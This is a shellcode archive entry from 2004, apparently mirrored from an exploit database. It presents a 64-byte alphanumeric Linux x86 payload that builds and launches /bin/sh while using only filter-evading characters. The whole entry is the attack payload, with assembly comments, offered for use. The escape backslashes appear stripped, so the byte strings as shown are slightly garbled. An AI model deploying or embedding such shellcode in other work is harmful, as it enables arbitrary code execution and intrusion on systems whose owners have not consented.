[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 alpha-numeric shellcode 64 bytes
# Published : 2004-12-22
# Author : xort
# Previous Title : linux/x86 setreuid/execve 31 bytes
# Next Title : linux/x86 alpha-numeric using IMUL Method shellcode 88 bytes
/*--------------------------------------*/
/* 64 byte alpha-numeric shellcode */
/* by XORt@dallas_2600 64bytes */
/*--------------------------------------*/
"x6ax30" /* pushb $0x30 */
"x58" /* pop %eax */
"x34x30" /* xorb $0x30, %al */
"x50" /* push %eax */
"x5a" /* pop %edx */
"x48" /* dec %eax */
"x66x35x41x30" /* xorl $0x3041, %ax */
"x66x35x73x4f" /* xorl $0x4f73, %ax */
"x50" /* push %eax */
"x52" /* pushl %edx */
"x58" /* pop %eax */
"x684J4A" /* pushl "4J4A" */
"x68PSTY" /* pushl "PSTY" */
"x68UVWa" /* pushl "UVWa" */
"x68QRPT" /* pushl "QRPT" */
"x68PTXR" /* pushl "PTXR" */
"x68binH" /* pushl "binH" */
"x68IQ50" /* pushl "IQ50" */
"x68shDY" /* pushl "shDY" */
"x68Rha0" /* pushl "Rha0" */
/*--------------------------------------*/
// www.Syue.com [2004-12-22]